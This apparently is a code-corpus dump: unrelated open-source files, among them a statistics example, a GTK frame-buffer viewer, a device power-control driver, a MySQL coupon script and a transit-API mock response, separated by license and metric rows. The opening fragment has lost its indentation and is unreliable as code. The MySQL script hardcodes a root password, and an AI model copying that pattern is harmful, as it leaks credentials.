cur.execute('SELECT name, difficulty, minimum, id FROM jobs WHERE dump = 1')
job = cur.fetchall()
jobName = job[0]['name']
jobAmount = job[0]['difficulty']
jobId = job[0]['id']
for p in range(len(rangeDict)):
found = False
for q in range(len(idList)):
if rangeDict[p]['id'] == idList[q][0]:
found = True
idnum = rangeDict[p]['id']
if not found:
cur.execute('INSERT IGNORE INTO jobs_done(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount))
conn.commit()
cur.execute('INSERT INTO jobs_done_history(id, job_name, job_id, amount) VALUES(%s, %s, %s, %s)', (idnum, jobName, jobId, jobAmount))
conn.commit()
cur.execute('UPDATE swimmers set job_total = job_total + %s WHERE id=%s', (int(jobAmount), idnum))
conn.commit()
conn.close()
return idList
| mit | 7,270,981,957,304,775,000 | 29.236842 | 145 | 0.547433 | false | 3.643763 | false | false | false |
0todd0000/spm1d | spm1d/rft1d/examples/weather_1_rft.py | 1 | 2199 |
import numpy as np
from scipy.ndimage.filters import gaussian_filter1d
from matplotlib import pyplot
from spm1d import rft1d
#(0) Load weather data:
weather = rft1d.data.weather() #dictionay containing geographical locations
### choose two geographical locations:
yA,yB = weather['Atlantic'], weather['Continental']
### smooth:
yA = gaussian_filter1d(yA, 8.0, axis=1, mode='wrap')
yB = gaussian_filter1d(yB, 8.0, axis=1, mode='wrap')
#(1) Two-sample t statistic (comparing just the two largest groups):
nA,nB = yA.shape[0], yB.shape[0] #sample sizes
mA,mB = yA.mean(axis=0), yB.mean(axis=0) #means
sA,sB = yA.std(ddof=1, axis=0), yB.std(ddof=1, axis=0) #standard deviations
s = np.sqrt( ((nA-1)*sA*sA + (nB-1)*sB*sB) / (nA + nB - 2) ) #pooled standard deviation
t = (mA-mB) / ( s *np.sqrt(1.0/nA + 1.0/nB)) #t field
#(2) Estimate field smoothness:
rA,rB = yA-mA, yB-mB #residuals
r = np.vstack([rA,rB])
FWHM = rft1d.geom.estimate_fwhm(r)
#(3) Critical threshold (classical hypothesis testing):
alpha = 0.05
df = nA + nB - 2 #degrees of freedom
Q = yA.shape[1] #number of nodes (field length = Q-1)
tstar = rft1d.t.isf(alpha, df, Q, FWHM) #inverse survival function
#(4) Get upcrossing metrics:
calc = rft1d.geom.ClusterMetricCalculator()
k = calc.cluster_extents(t, tstar, interp=True)
k_resels = [kk/FWHM for kk in k]
nClusters = len(k)
#(5) Probabilities:
rftcalc = rft1d.prob.RFTCalculator(STAT='T', df=(1,df), nodes=Q, FWHM=FWHM)
Pset = rftcalc.p.set(nClusters, min(k_resels), tstar)
Pcluster = [rftcalc.p.cluster(kk, tstar) for kk in k_resels]
#(6) Plot:
pyplot.close('all')
ax = pyplot.axes()
ax.plot(t, 'k', lw=3, label='t field')
ax.plot([0,Q], [tstar]*2, 'r--', label='Critical threshold')
### legend:
ax.legend(loc='upper left')
### cluster p values:
ax.text(10, 3.0, 'p = %.3f'%Pcluster[0])
ax.text(300, 3.6, 'p = %.3f'%Pcluster[1])
ax.text(280, 2.3, r'$\alpha$ = %.3f'%alpha, color='r')
### axis labels:
ax.set_xlabel('Day', size=16)
ax.set_ylabel('t value', size=16)
ax.set_title('RFT-based inference of weather dataset', size=20)
pyplot.show()
| gpl-3.0 | -8,181,589,285,242,608,000 | 27.558442 | 104 | 0.638927 | false | 2.398037 | false | false | false |
flyingarg/GPU-Viewer | GPU-Viewer/FrameBuffer.py | 1 | 3651 | import gi
import os
import Const
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from Common import setScreenSize, setBackgroundColor, createScrollbar
FrameBufferList = ["vid", "vdep", "vt", "xsp", "bfsz", "lvl", "rt", "db", "st", "rsz", "gsz", "bsz", "asz", "flt",
"srgb", "aux", "depth", "stcl",
"acr", "acg", "acb", "aca", "msnum", "msbufs", "caveats"]
def FrameBuffer(button):
def GLXFB(button, value):
FB_Store.clear()
TreeFB.set_model(FB_Store)
if value == 1:
os.system(
"glxinfo | awk '/GLX Visuals.*/{flag=1;next}/GLXFBConfigs.*/{flag=0}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXVisual.txt")
list = []
with open("/tmp/FrameBufferGLXVisual.txt", "r") as file1:
for line in file1:
list.append(line.split())
for i in range(len(list) - 1):
background_color = setBackgroundColor(i)
FB_Store.append(list[i] + [background_color])
label = "%d GLX Visuals" % (len(list) - 1)
button.set_label(label)
if value == 2:
os.system(
"glxinfo | awk '/GLXFBConfigs.*/{flag=1;next}flag' | awk '/----.*/{flag=1;next}flag' > /tmp/FrameBufferGLXFBconfigs.txt")
list = []
with open("/tmp/FrameBufferGLXFBconfigs.txt", "r") as file1:
for line in file1:
list.append(line.split())
for i in range(len(list) - 1):
background_color = setBackgroundColor(i)
if list[i][6] == "r" or list[i][6] == "c":
pass
else:
list[i].insert(6, ".")
FB_Store.append(list[i] + [background_color])
label = "%d GLXFBConfigs" % (len(list) - 1)
button.set_label(label)
FBWin = Gtk.Window()
FBWin.set_title("GLX Frame Buffer Configuration")
# FBWin.set_size_request(1000, 500)
setScreenSize(FBWin, Const.WIDTH_RATIO, Const.HEIGHT_RATIO2)
FBGrid = Gtk.Grid()
FBWin.add(FBGrid)
FBGrid.set_border_width(20)
FBGrid.set_row_spacing(30)
FBGLXButton = Gtk.RadioButton("GLX Visuals")
FBGLXButton.connect("toggled", GLXFB, 1)
FBGrid.add(FBGLXButton)
FBConfigButton = Gtk.RadioButton.new_from_widget(FBGLXButton)
FBConfigButton.set_label("GLXFBConfigs")
FBConfigButton.connect("toggled", GLXFB, 2)
FBGrid.attach_next_to(FBConfigButton, FBGLXButton, Gtk.PositionType.RIGHT, 1, 1)
FBFrame = Gtk.Frame()
FB_Store = Gtk.ListStore(str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str, str,
str, str, str, str, str, str, str, str)
TreeFB = Gtk.TreeView(FB_Store, expand=True)
TreeFB.set_enable_search(True)
TreeFB.set_property("enable-grid-lines", 3)
FBConfigButton.set_active(True)
FBGLXButton.set_active(True)
for i, column_title in enumerate(FrameBufferList):
FBrenderer = Gtk.CellRendererText(font=Const.FONT)
column = Gtk.TreeViewColumn(column_title, FBrenderer, text=i)
column.add_attribute(FBrenderer, "background", 25)
if i < len(FrameBufferList) - 1:
FBrenderer.set_alignment(0.5, 0.5)
column.set_alignment(0.5)
column.set_property("min-width", 40)
TreeFB.append_column(column)
FBScrollbar = createScrollbar(TreeFB)
FBFrame.add(FBScrollbar)
FBGrid.attach_next_to(FBFrame, FBGLXButton, Gtk.PositionType.BOTTOM, 25, 1)
FBWin.show_all()
# Gtk.main()
| gpl-3.0 | -2,104,989,221,263,291,000 | 37.431579 | 157 | 0.580663 | false | 3.199825 | true | false | false |
motivator/clusto | src/clusto/drivers/base/device.py | 5 | 3638 | from clusto.drivers.base import Driver
import sys
class Device(Driver):
_properties = {'model':None,
'serialnum':None,
'manufacturer':None}
_clustotype = "device"
_driver_name = "device"
@classmethod
def get_by_serial_number(self, serialnum):
pass
def _get_hostname(self):
"""return a hostname set for this device or its entity name"""
hostname = self.attrs("hostname")
if hostname:
return hostname[0].value
else:
return self.entity.name
def _set_hostname(self, name):
self.set_attr("hostname", value=name)
hostname = property(_get_hostname, _set_hostname)
@property
def fqdns(self):
"""return the fully qualified domain names for this device"""
return self.attr_values("fqdn")
def add_fqdn(self, fqdn):
"""add a fully qualified domain name"""
if not self.has_attr("fqdn", number=True, value=fqdn):
self.add_attr("fqdn", number=True, value=fqdn)
def remove_fqdn(self, fqdn):
"""remove a fully qualified domain name"""
self.del_attrs("fqdn", number=True, value=fqdn)
def _power_captcha(self, action='reboot'):
while True:
sys.stdout.write('Are you sure you want to %s %s (yes/no)? ' %
(action, self.name,))
line = sys.stdin.readline().rstrip('\r\n')
if line == 'yes':
return True
if line == 'no':
return False
sys.stdout.write('"yes" or "no", please\n')
def power_on(self, captcha=True):
if captcha and not self._power_captcha('power on'):
return
ports_set = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].set_power_on(porttype, port['otherportnum'])
ports_set += 1
return ports_set
def power_off(self, captcha=True):
if captcha and not self._power_captcha('power off'):
return
ports_set = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].set_power_off(porttype, port['otherportnum'])
ports_set += 1
return ports_set
def power_reboot(self, captcha=True):
if captcha and not self._power_captcha('reboot'):
return
ports_rebooted = 0
for porttype, ports in self.port_info.items():
if not porttype.startswith('pwr-'): continue
for portnum, port in ports.items():
if not port['connection']: continue
port['connection'].reboot(porttype, port['otherportnum'])
ports_rebooted += 1
return ports_rebooted
def console(self, ssh_user='root'):
console = self.port_info['console-serial'][1]
if not console['connection']:
sys.stderr.write('No console connected to %s console-serial:1\n' % self.name)
sys.stderr.flush()
return
if not hasattr(console['connection'], 'console'):
sys.stderr.write('No console method on %s\n' % console.name)
sys.stderr.flush()
return
console['connection'].connect('console-serial', console['otherportnum'], ssh_user)
| bsd-3-clause | 3,395,162,878,551,785,000 | 30.912281 | 90 | 0.564596 | false | 4.176808 | false | false | false |
Yrthgze/prueba-sourcetree2 | Drake-Z/0002/0002.py | 2 | 1231 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'第 0002 题:将 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。'
__author__ = 'Drake-Z'
import mysql.connector
def write_to_mysql(filename):
conn = mysql.connector.connect(user='root', password='986535', database='test')
cursor = conn.cursor()
cursor.execute("DROP TABLE IF EXISTS user")
cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
f = open(filename, 'r').readlines()
for line, num in zip(f, range(1, len(f)+1)):
line = line[:-1] #去除\n符号
cursor.execute('insert into user (id, name) values (%s, %s)', [str(num), line])
conn.commit()
cursor.close()
return 0
def search_mysql():
b = input('Search Active code(1-200):')
conn = mysql.connector.connect(user='root', password='986535', database='test')
cursor = conn.cursor()
cursor.execute('select * from user where id = %s', (b,))
values = cursor.fetchall()
print(values)
cursor.close()
conn.close()
return 0
if __name__ == '__main__':
filename = 'active_code.txt'
write_to_mysql(filename)
search_mysql() | mit | -1,601,573,057,003,070,500 | 30.297297 | 87 | 0.611927 | false | 2.981959 | false | false | false |
CanalTP/kirin | tests/mock_navitia/vj_9580.py | 1 | 29816 | # coding=utf-8
#
# Copyright (c) 2001, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# [matrix] channel #navitia:matrix.org (https://app.element.io/#/room/#navitia:matrix.org)
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from tests.mock_navitia import navitia_response
response = navitia_response.NavitiaResponse()
response.queries = [
"vehicle_journeys/?depth=2&since=20121120T120100Z&headsign=9580&show_codes=true&until=20121120T214600Z"
]
response.response_code = 200
response.json_response = """{
"pagination": {
"start_page": 0,
"items_on_page": 1,
"items_per_page": 25,
"total_result": 1
},
"links": [
{
"href": "http://localhost:5001/v1/coverage/stif/stop_points/{stop_point.id}",
"type": "stop_point",
"rel": "stop_points",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/stop_areas/{stop_area.id}",
"type": "stop_area",
"rel": "stop_areas",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/journey_patterns/{journey_pattern.id}",
"type": "journey_pattern",
"rel": "journey_patterns",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/routes/{route.id}",
"type": "route",
"rel": "routes",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/journey_pattern_points/{journey_pattern_point.id}",
"type": "journey_pattern_point",
"rel": "journey_pattern_points",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys/{vehicle_journeys.id}",
"type": "vehicle_journeys",
"rel": "vehicle_journeys",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/trips/{trip.id}",
"type": "trip",
"rel": "trips",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys?depth=2&since=20121120T115800%2B0000&until=20121120T214630%2B0000&headsign=9580",
"type": "first",
"templated": false
}
],
"disruptions": [],
"feed_publishers": [],
"context": {
"timezone": "Europe/Paris",
"current_datetime": "20190515T111555"
},
"vehicle_journeys": [
{
"codes": [],
"name": "9580",
"journey_pattern": {
"route": {
"direction": {
"embedded_type": "stop_area",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-751008-BV"
},
{
"type": "UIC8",
"value": "87751008"
},
{
"type": "external_code",
"value": "OCE87751008"
}
],
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87751008"
},
"quality": 0,
"name": "gare de Marseille-St-Charles (Marseille)",
"id": "stop_area:OCE:SA:87751008"
},
"name": "Frankfurt-am-Main-Hbf vers Marseille-St-Charles",
"links": [],
"is_frequence": "False",
"geojson": {
"type": "MultiLineString",
"coordinates": []
},
"direction_type": "forward",
"id": "route:OCE:TGV-80110684-87751008-1"
},
"id": "journey_pattern:7491",
"name": "journey_pattern:7491"
},
"disruptions": [],
"calendars": [
{
"exceptions": [
{
"type": "remove",
"datetime": "20121201"
}
],
"active_periods": [
{
"begin": "20121029",
"end": "20121208"
}
],
"week_pattern": {
"monday": true,
"tuesday": true,
"friday": true,
"wednesday": true,
"thursday": true,
"sunday": true,
"saturday": true
}
}
],
"stop_times": [
{
"stop_point": {
"name": "gare de Frankfurt-am-Main-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Frankfurt-am-Main-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80110684",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-110684-00"
},
{
"type": "UIC8",
"value": "80110684"
},
{
"type": "external_code",
"value": "OCE80110684"
}
],
"name": "gare de Frankfurt-am-Main-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Frankfurt-am-Main-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80110684"
}
},
"utc_arrival_time": "130100",
"utc_departure_time": "130100",
"headsign": "9580",
"arrival_time": "140100",
"journey_pattern_point": {
"id": "journey_pattern_point:71093"
},
"departure_time": "140100"
},
{
"stop_point": {
"name": "gare de Mannheim-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Mannheim-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80140087",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-140087-BV"
},
{
"type": "UIC8",
"value": "80140087"
},
{
"type": "external_code",
"value": "OCE80140087"
}
],
"name": "gare de Mannheim-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Mannheim-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80140087"
}
},
"utc_arrival_time": "133700",
"utc_departure_time": "134000",
"headsign": "9580",
"arrival_time": "143700",
"journey_pattern_point": {
"id": "journey_pattern_point:71094"
},
"departure_time": "144000"
},
{
"stop_point": {
"name": "gare de Karlsruhe-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Karlsruhe-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80142281",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-142281-BV"
},
{
"type": "UIC8",
"value": "80142281"
},
{
"type": "external_code",
"value": "OCE80142281"
}
],
"name": "gare de Karlsruhe-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Karlsruhe-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80142281"
}
},
"utc_arrival_time": "140200",
"utc_departure_time": "141200",
"headsign": "9580",
"arrival_time": "150200",
"journey_pattern_point": {
"id": "journey_pattern_point:71095"
},
"departure_time": "151200"
},
{
"stop_point": {
"name": "gare de Baden-Baden",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Baden-Baden",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80142778",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-142778-BV"
},
{
"type": "UIC8",
"value": "80142778"
},
{
"type": "external_code",
"value": "OCE80142778"
}
],
"name": "gare de Baden-Baden",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Baden-Baden",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80142778"
}
},
"utc_arrival_time": "143100",
"utc_departure_time": "143400",
"headsign": "9580",
"arrival_time": "153100",
"journey_pattern_point": {
"id": "journey_pattern_point:71096"
},
"departure_time": "153400"
},
{
"stop_point": {
"name": "gare de Strasbourg",
"links": [],
"coord": {
"lat": "48.585151",
"lon": "7.733945"
},
"label": "gare de Strasbourg (Strasbourg)",
"equipments": [],
"administrative_regions": [
{
"insee": "67482",
"name": "Strasbourg",
"level": 8,
"coord": {
"lat": "48.584614",
"lon": "7.750712"
},
"label": "Strasbourg (67000-67200)",
"id": "admin:fr:67482",
"zip_code": "67000;67200"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87212027",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-212027-BV"
},
{
"type": "UIC8",
"value": "87212027"
},
{
"type": "external_code",
"value": "OCE87212027"
}
],
"name": "gare de Strasbourg",
"links": [],
"coord": {
"lat": "48.585151",
"lon": "7.733945"
},
"label": "gare de Strasbourg (Strasbourg)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87212027"
}
},
"utc_arrival_time": "150300",
"utc_departure_time": "151200",
"headsign": "9581",
"arrival_time": "160300",
"journey_pattern_point": {
"id": "journey_pattern_point:71097"
},
"departure_time": "161200"
},
{
"stop_point": {
"name": "gare de Mulhouse",
"links": [],
"coord": {
"lat": "47.741786",
"lon": "7.342833"
},
"label": "gare de Mulhouse (Mulhouse)",
"equipments": [],
"administrative_regions": [
{
"insee": "68224",
"name": "Mulhouse",
"level": 8,
"coord": {
"lat": "47.749416",
"lon": "7.339935"
},
"label": "Mulhouse (68100-68200)",
"id": "admin:fr:68224",
"zip_code": "68100;68200"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87182063",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-182063-BV"
},
{
"type": "UIC8",
"value": "87182063"
},
{
"type": "external_code",
"value": "OCE87182063"
}
],
"name": "gare de Mulhouse",
"links": [],
"coord": {
"lat": "47.741786",
"lon": "7.342833"
},
"label": "gare de Mulhouse (Mulhouse)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87182063"
}
},
"utc_arrival_time": "155900",
"utc_departure_time": "160800",
"headsign": "9580",
"arrival_time": "165900",
"journey_pattern_point": {
"id": "journey_pattern_point:71098"
},
"departure_time": "170800"
},
{
"stop_point": {
"name": "gare de Belfort-Montbéliard-TGV",
"links": [],
"coord": {
"lat": "47.586579",
"lon": "6.899019"
},
"label": "gare de Belfort-Montbéliard-TGV (Meroux)",
"equipments": [],
"administrative_regions": [
{
"insee": "90068",
"name": "Meroux",
"level": 8,
"coord": {
"lat": "47.596069",
"lon": "6.899145"
},
"label": "Meroux (90400)",
"id": "admin:fr:90068",
"zip_code": "90400"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87300822",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-300822-BV"
},
{
"type": "UIC8",
"value": "87300822"
},
{
"type": "external_code",
"value": "OCE87300822"
}
],
"name": "gare de Belfort-Montbéliard-TGV",
"links": [],
"coord": {
"lat": "47.586579",
"lon": "6.899019"
},
"label": "gare de Belfort-Montbéliard-TGV (Meroux)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87300822"
}
},
"utc_arrival_time": "163000",
"utc_departure_time": "163300",
"headsign": "9580",
"arrival_time": "173000",
"journey_pattern_point": {
"id": "journey_pattern_point:71099"
},
"departure_time": "173300"
},
{
"stop_point": {
"name": "gare de Besançon-Franche-Comté",
"links": [],
"coord": {
"lat": "47.30746",
"lon": "5.954751"
},
"label": "gare de Besançon-Franche-Comté (Les Auxons)",
"equipments": [],
"administrative_regions": [
{
"insee": "25035",
"name": "Les Auxons",
"level": 8,
"coord": {
"lat": "47.301167",
"lon": "5.957158"
},
"label": "Les Auxons (25870)",
"id": "admin:fr:25035",
"zip_code": "25870"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87300863",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-300863-BV"
},
{
"type": "UIC8",
"value": "87300863"
},
{
"type": "external_code",
"value": "OCE87300863"
}
],
"name": "gare de Besançon-Franche-Comté",
"links": [],
"coord": {
"lat": "47.30746",
"lon": "5.954751"
},
"label": "gare de Besançon-Franche-Comté (Les Auxons)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87300863"
}
},
"utc_arrival_time": "165400",
"utc_departure_time": "165900",
"headsign": "9580",
"arrival_time": "175400",
"journey_pattern_point": {
"id": "journey_pattern_point:71100"
},
"departure_time": "175900"
},
{
"stop_point": {
"name": "gare de Chalon-sur-Saône",
"links": [],
"coord": {
"lat": "46.781666",
"lon": "4.84323"
},
"label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)",
"equipments": [],
"administrative_regions": [
{
"insee": "71076",
"name": "Chalon-sur-Saône",
"level": 8,
"coord": {
"lat": "46.788898",
"lon": "4.85296"
},
"label": "Chalon-sur-Saône (71100)",
"id": "admin:fr:71076",
"zip_code": "71100"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87725002",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-725002-BV"
},
{
"type": "UIC8",
"value": "87725002"
},
{
"type": "external_code",
"value": "OCE87725002"
}
],
"name": "gare de Chalon-sur-Saône",
"links": [],
"coord": {
"lat": "46.781666",
"lon": "4.84323"
},
"label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87725002"
}
},
"utc_arrival_time": "175400",
"utc_departure_time": "175600",
"headsign": "9581",
"arrival_time": "185400",
"journey_pattern_point": {
"id": "journey_pattern_point:71101"
},
"departure_time": "185600"
},
{
"stop_point": {
"name": "gare de Lyon-Part-Dieu",
"links": [],
"coord": {
"lat": "45.76058",
"lon": "4.859438"
},
"label": "gare de Lyon-Part-Dieu (Lyon)",
"equipments": [],
"administrative_regions": [
{
"insee": "69123",
"name": "Lyon",
"level": 8,
"coord": {
"lat": "45.757812",
"lon": "4.832011"
},
"label": "Lyon (69001-69009)",
"id": "admin:fr:69123",
"zip_code": "69001;69009"
},
{
"insee": "69383",
"name": "Lyon 3e Arrondissement",
"level": 9,
"coord": {
"lat": "45.759933",
"lon": "4.849389"
},
"label": "Lyon 3e Arrondissement (69003)",
"id": "admin:fr:69383",
"zip_code": "69003"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87723197",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-723197-BV"
},
{
"type": "UIC8",
"value": "87723197"
},
{
"type": "external_code",
"value": "OCE87723197"
}
],
"name": "gare de Lyon-Part-Dieu",
"links": [],
"coord": {
"lat": "45.76058",
"lon": "4.859438"
},
"label": "gare de Lyon-Part-Dieu (Lyon)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87723197"
}
},
"utc_arrival_time": "185600",
"utc_departure_time": "190600",
"headsign": "9581",
"arrival_time": "195600",
"journey_pattern_point": {
"id": "journey_pattern_point:71102"
},
"departure_time": "200600"
},
{
"stop_point": {
"name": "gare de Avignon-TGV",
"links": [],
"coord": {
"lat": "43.921963",
"lon": "4.78616"
},
"label": "gare de Avignon-TGV (Avignon)",
"equipments": [],
"administrative_regions": [
{
"insee": "84007",
"name": "Avignon",
"level": 8,
"coord": {
"lat": "43.949314",
"lon": "4.806032"
},
"label": "Avignon (84000)",
"id": "admin:fr:84007",
"zip_code": "84000"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87318964",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-318964-BV"
},
{
"type": "UIC8",
"value": "87318964"
},
{
"type": "external_code",
"value": "OCE87318964"
}
],
"name": "gare de Avignon-TGV",
"links": [],
"coord": {
"lat": "43.921963",
"lon": "4.78616"
},
"label": "gare de Avignon-TGV (Avignon)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87318964"
}
},
"utc_arrival_time": "200800",
"utc_departure_time": "201100",
"headsign": "9581",
"arrival_time": "210800",
"journey_pattern_point": {
"id": "journey_pattern_point:71103"
},
"departure_time": "211100"
},
{
"stop_point": {
"name": "gare de Aix-en-Provence-TGV",
"links": [],
"coord": {
"lat": "43.455151",
"lon": "5.317273"
},
"label": "gare de Aix-en-Provence-TGV (Aix-en-Provence)",
"equipments": [],
"administrative_regions": [
{
"insee": "13001",
"name": "Aix-en-Provence",
"level": 8,
"coord": {
"lat": "43.529842",
"lon": "5.447473"
},
"label": "Aix-en-Provence (13090-13100)",
"id": "admin:fr:13001",
"zip_code": "13090;13100"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87319012",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-319012-00"
},
{
"type": "UIC8",
"value": "87319012"
},
{
"type": "external_code",
"value": "OCE87319012"
}
],
"name": "gare de Aix-en-Provence-TGV",
"links": [],
"coord": {
"lat": "43.455151",
"lon": "5.317273"
},
"label": "gare de Aix-en-Provence-TGV (Aix-en-Provence)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87319012"
}
},
"utc_arrival_time": "203100",
"utc_departure_time": "203400",
"headsign": "9581",
"arrival_time": "213100",
"journey_pattern_point": {
"id": "journey_pattern_point:71104"
},
"departure_time": "213400"
},
{
"stop_point": {
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"equipments": [],
"administrative_regions": [
{
"insee": "13055",
"name": "Marseille",
"level": 8,
"coord": {
"lat": "43.296173",
"lon": "5.369952"
},
"label": "Marseille (13000-13016)",
"id": "admin:fr:13055",
"zip_code": "13000;13016"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87751008",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-751008-BV"
},
{
"type": "UIC8",
"value": "87751008"
},
{
"type": "external_code",
"value": "OCE87751008"
}
],
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87751008"
}
},
"utc_arrival_time": "204600",
"utc_departure_time": "204600",
"headsign": "9581",
"arrival_time": "214600",
"journey_pattern_point": {
"id": "journey_pattern_point:71105"
},
"departure_time": "214600"
}
],
"validity_pattern": {
"beginning_date": "20120913",
"days": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111101111111111111111111111111111111110000000000000000000000000000000000000000000000"
},
"id": "vehicle_journey:OCE:SN009580F03012_dst_1",
"trip": {
"id": "OCE:SN009580F03012",
"name": "9580"
}
}
]
}"""
| agpl-3.0 | 8,753,083,801,675,113,000 | 29.749226 | 384 | 0.373305 | false | 3.691278 | false | false | false |
cemagg/sucem-fem | sucemfem/PostProcessing/ntff_expressions.py | 1 | 1402 | ## Copyright (C) 2011 Stellenbosch University
##
## This file is part of SUCEM.
##
## SUCEM is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## SUCEM is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with SUCEM. If not, see <http://www.gnu.org/licenses/>.
##
## Contact: cemagga@gmail.com
# Authors:
# Neilen Marais <nmarais@gmail.com>
import dolfin
from dolfin import dot
get_r_hat = lambda : dolfin.Expression(
['sin(theta)*cos(phi)', 'sin(theta)*sin(phi)', 'cos(theta)'],
theta=0, phi=0)
